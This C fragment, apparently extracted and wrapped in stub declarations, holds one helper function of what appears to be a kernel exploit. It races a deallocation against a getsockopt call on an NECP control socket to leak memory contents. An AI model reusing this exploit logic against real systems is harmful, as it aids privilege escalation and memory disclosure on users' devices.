
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef scalar_t__ uint64_t ;
struct map_address_racer_context {int deallocated; int do_map; scalar_t__* address; int size; } ;
typedef int socklen_t ;


 int DEBUG_TRACE (char*) ;
 int SYSPROTO_CONTROL ;
 int getsockopt (int,int ,int ,scalar_t__*,int *) ;

__attribute__((used)) static bool try_necp_leak(int ctlfd, struct map_address_racer_context *context) {
 socklen_t length = context->size;

 while (!context->deallocated) {};
 context->deallocated = 0;

 context->do_map = 1;

 int err = getsockopt(ctlfd, SYSPROTO_CONTROL, 0, context->address, &length);
 if (err) {
  DEBUG_TRACE("Did not allocate in time");
  return 0;
 }


 uint64_t *data = context->address;
 if (data[0] == 0 && data[1] == 0) {
  return 0;
 }

 return 1;
}
